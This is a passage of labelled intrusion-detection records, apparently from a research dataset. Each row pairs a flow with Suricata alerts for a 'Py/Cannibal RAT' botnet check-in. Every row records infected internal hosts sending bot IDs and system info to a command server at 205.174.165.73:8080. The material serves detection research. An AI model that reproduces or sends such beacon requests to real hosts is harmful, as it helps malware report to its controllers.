'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:02.749209+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob0xAAIAGTdTAqAoPza6lScxYH5D03yW7MuqiQFARAQCVdQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,044 |
192.168.10.9-2751-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4536609, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:08 | 71,674 | Friday | [{'timestamp': '2017-07-07T13:28:08.662879+0000', 'flow_id': 234460325349310, 'pcap_cnt': 4536609, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2751, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:08.591806+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPhVAAIAGfxHAqAoJza6lSQq/H5A2TG5Dzr/nyFARAQDrwgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:08.662879+0000', 'flow_id': 234460325349310, 'pcap_cnt': 4536609, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2751, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:08.591806+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPhVAAIAGfxHAqAoJza6lSQq/H5A2TG5Dzr/nyFARAQDrwgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,145 |
192.168.10.14-51611-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4536864, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:11 | 64,894 | Friday | [{'timestamp': '2017-07-07T13:28:11.304123+0000', 'flow_id': 1985698880792933, 'pcap_cnt': 4536864, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51611, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:11.239973+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGXxAAIAGo6XAqAoOza6lScmbH5B5wZBAExALklARAQBfVQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:11.304123+0000', 'flow_id': 1985698880792933, 'pcap_cnt': 4536864, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51611, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:11.239973+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGXxAAIAGo6XAqAoOza6lScmbH5B5wZBAExALklARAQBfVQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,185 |
192.168.10.15-52313-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4537641, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:12 | 63,685 | Friday | [{'timestamp': '2017-07-07T13:28:12.879118+0000', 'flow_id': 1819638265312155, 'pcap_cnt': 4537641, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52313, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:12.816027+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob1FAAIAGTc/AqAoPza6lScxZH5CZKQVbk19CTVARAQARCQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:12.879118+0000', 'flow_id': 1819638265312155, 'pcap_cnt': 4537641, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52313, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:12.816027+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob1FAAIAGTc/AqAoPza6lScxZH5CZKQVbk19CTVARAQARCQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,229 |
192.168.10.9-2752-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4538703, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:18 | 65,765 | Friday | [{'timestamp': '2017-07-07T13:28:18.737786+0000', 'flow_id': 544982166553467, 'pcap_cnt': 4538703, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2752, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:18.672635+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPhpAAIAGfwzAqAoJza6lSQrAH5Az5Wuaao3PylARAQBtAgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:18.737786+0000', 'flow_id': 544982166553467, 'pcap_cnt': 4538703, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2752, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:18.672635+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPhpAAIAGfwzAqAoJza6lSQrAH5Az5Wuaao3PylARAQBtAgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,263 |
192.168.10.14-51612-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4539007, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:21 | 66,124 | Friday | [{'timestamp': '2017-07-07T13:28:21.370916+0000', 'flow_id': 1349253447657902, 'pcap_cnt': 4539007, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51612, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:21.305582+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGYFAAIAGo6DAqAoOza6lScmcH5CDC0L/+FrDvlARAQAF1AAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:21.370916+0000', 'flow_id': 1349253447657902, 'pcap_cnt': 4539007, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51612, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:21.305582+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGYFAAIAGo6DAqAoOza6lScmcH5CDC0L/+FrDvlARAQAF1AAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,276 |
